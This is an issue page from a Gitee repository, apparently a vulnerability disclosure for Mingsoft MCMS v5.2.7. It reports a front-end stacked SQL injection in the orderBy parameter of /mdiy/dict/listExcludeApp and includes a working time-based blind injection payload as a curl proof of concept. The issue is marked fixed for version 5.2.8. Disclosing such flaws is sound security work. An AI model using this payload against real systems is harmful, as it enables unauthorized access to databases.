4.1K Star 16.9K Fork 6.6K

GVP铭飞 / MCMS

 / 详情

Mingsoft MCMS v5.2.7 SQL注入【前台】

已完成
创建于  
2022-04-27 00:24

/mdiy/dict/listExcludeApp路由的orderBy参数存在堆叠SQL注入
输入图片说明
输入图片说明

证明

curl -w "%{time_total}\n" -i -I -X $'GET' $'http://127.0.0.1:8080/mdiy/dict/listExcludeApp?dictType=1&orderBy=1;select/**/if(substring((select/**/database()),1,4)=\'mcms\',sleep(3),1);'

输入图片说明
输入图片说明

评论 (0)

辛夷 创建了任务
铭飞 任务状态从 待办的 修改为进行中
铭飞 任务状态从 进行中 修改为已完成
铭飞 里程碑设置为5.2.8
展开全部操作日志

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
Java
1
https://gitee.com/mingSoft/MCMS.git
git@gitee.com:mingSoft/MCMS.git
mingSoft
MCMS
MCMS

搜索帮助